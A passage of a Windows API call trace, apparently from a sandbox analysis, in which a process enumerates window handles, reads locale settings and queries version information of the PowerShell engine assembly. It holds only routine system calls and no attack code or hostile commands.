	[0630.720] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xb0
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x250
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x240
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x790
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x61c
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x540
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x538
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x568
	[0630.720] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x538
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x568
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x538
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x540
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x540
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x57c
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x460
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x554
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x528
	[0630.721] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x79c
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4e0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x460
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x460
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x44c
	[0630.722] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x778
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x460
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x558
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x4d0
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1bb4
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10bc
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b50
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x14b4
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x149c
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x14a8
	[0630.723] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1490
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x14a4
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x148c
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1458
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b4c
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1b3c
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x19bc
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x199c
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1998
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1994
	[0630.724] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1990
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1984
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x197c
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1978
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1824
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1088
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1908
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x18cc
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x18d0
	[0630.725] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1840
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10c4
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x128c
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16e8
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16cc
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x274
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10e0
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10cc
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10c0
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x10d0
	[0630.726] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1198
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1080
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1074
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x106c
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1474
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1414
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xbd0
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x550
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xa38
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16d0
	[0630.727] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x16d4
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x15bc
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x15a0
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x159c
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1598
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1594
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1590
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x158c
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1588
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1584
	[0630.728] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1580
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x157c
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1488
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1404
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11b8
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xbd4
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe0c
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xd30
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe70
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13b8
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe20
	[0630.729] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe2c
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe00
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe04
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xc94
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13b0
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13ac
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x13a8
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1374
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x132c
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1328
	[0630.730] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12d0
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12cc
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x12c8
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1290
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1218
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1214
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11ec
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11e8
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x11cc
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0x1140
	[0630.731] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1cdde0 | out: lpdwProcessId=0x1cdde0) returned 0xe6c
	[0630.735] WerSetFlags () returned 0x0
	[0633.568] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0633.568] CoTaskMemFree (pv=0x0) 
	[0633.570] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce140 | out: pulNumLanguages=0x1ce148, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce140) returned 1
	[0633.570] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce148, pwszLanguagesBuffer=0x2d53f20, pcchLanguagesBuffer=0x1ce140 | out: pulNumLanguages=0x1ce148, pwszLanguagesBuffer=0x2d53f20, pcchLanguagesBuffer=0x1ce140) returned 1
	[0633.576] CoTaskMemAlloc (cb=0x24) returned 0x3d2dd0
	[0633.576] GetUserDefaultLocaleName (in: lpLocaleName=0x3d2dd0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0633.576] CoTaskMemFree (pv=0x3d2dd0) 
	[0635.619] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0635.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.619] CoTaskMemFree (pv=0x3c3ff0) 
	[0635.621] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0635.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.621] CoTaskMemFree (pv=0x3c3ff0) 
	[0635.624] CoTaskMemAlloc (cb=0x104) returned 0x3c3ff0
	[0635.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.624] CoTaskMemFree (pv=0x3c3ff0) 
	[0635.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.635] SetErrorMode (uMode=0x1) returned 0x1
	[0635.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cddc0 | out: lpFileInformation=0x1cddc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0635.635] SetErrorMode (uMode=0x1) returned 0x1
	[0635.636] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce030 | out: lpdwHandle=0x1ce030) returned 0x94c
	[0635.638] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d577b0 | out: lpData=0x2d577b0) returned 1
	[0635.639] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdfa8, puLen=0x1cdfa0 | out: lplpBuffer=0x1cdfa8*=0x2d5784c, puLen=0x1cdfa0) returned 1
	[0635.639] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57928, puLen=0x1cdf10) returned 1
	[0635.639] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0635.639] CoTaskMemAlloc (cb=0x2e) returned 0x3dd9d0
	[0635.639] lstrcpyW (in: lpString1=0x3dd9d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0635.640] CoTaskMemFree (pv=0x3dd9d0) 
	[0635.640] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d5797c, puLen=0x1cdf10) returned 1
	[0635.640] lstrlenW (lpString="System.Management.Automation") returned 28
	[0635.640] CoTaskMemAlloc (cb=0x3c) returned 0x3dc1c0
	[0635.640] lstrcpyW (in: lpString1=0x3dc1c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0635.640] CoTaskMemFree (pv=0x3dc1c0) 
	[0635.640] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d579d8, puLen=0x1cdf10) returned 1
	[0635.640] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.640] CoTaskMemAlloc (cb=0x20) returned 0x3d8c60
	[0635.640] lstrcpyW (in: lpString1=0x3d8c60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.640] CoTaskMemFree (pv=0x3d8c60) 
	[0635.640] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57a18, puLen=0x1cdf10) returned 1
	[0635.640] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.640] CoTaskMemAlloc (cb=0x44) returned 0x3dc1c0
	[0635.640] lstrcpyW (in: lpString1=0x3dc1c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.640] CoTaskMemFree (pv=0x3dc1c0) 
	[0635.640] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57a80, puLen=0x1cdf10) returned 1
	[0635.640] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0635.640] CoTaskMemAlloc (cb=0x76) returned 0x36d780
	[0635.640] lstrcpyW (in: lpString1=0x36d780, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0635.640] CoTaskMemFree (pv=0x36d780) 
	[0635.640] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57b1c, puLen=0x1cdf10) returned 1
	[0635.640] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.640] CoTaskMemAlloc (cb=0x44) returned 0x3dc1c0
	[0635.641] lstrcpyW (in: lpString1=0x3dc1c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.641] CoTaskMemFree (pv=0x3dc1c0) 
	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57b80, puLen=0x1cdf10) returned 1
	[0635.641] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0635.641] CoTaskMemAlloc (cb=0x58) returned 0x325860
	[0635.641] lstrcpyW (in: lpString1=0x325860, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0635.641] CoTaskMemFree (pv=0x325860) 
	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d57bfc, puLen=0x1cdf10) returned 1
	[0635.641] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.641] CoTaskMemAlloc (cb=0x20) returned 0x3d8c60
	[0635.641] lstrcpyW (in: lpString1=0x3d8c60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.641] CoTaskMemFree (pv=0x3d8c60) 
	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x2d578a4, puLen=0x1cdf10) returned 1
	[0635.641] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0635.641] CoTaskMemAlloc (cb=0x66) returned 0x3d7e00
	[0635.641] lstrcpyW (in: lpString1=0x3d7e00, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0635.641] CoTaskMemFree (pv=0x3d7e00) 
	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x0, puLen=0x1cdf10) returned 0
	[0635.641] VerQueryValueW (in: pBlock=0x2d577b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdf18, puLen=0x1cdf10 | out: lplpBuffer=0x1cdf18*=0x0, puLen=0x1cdf10) returned 0
